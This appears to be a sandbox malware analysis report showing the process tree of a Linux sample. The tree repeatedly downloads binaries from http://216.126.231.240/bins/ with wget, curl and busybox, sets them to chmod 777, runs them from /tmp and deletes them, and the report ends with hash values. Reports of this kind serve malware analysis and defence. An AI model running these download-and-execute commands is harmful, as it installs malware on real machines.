/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:923
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:929
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:935
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:938
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:939
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:941
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:943
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:944
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:945
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:946
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:947
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:950
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:951
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:953
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:956
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:957
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:959
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:962
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:963
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:965
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:968
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97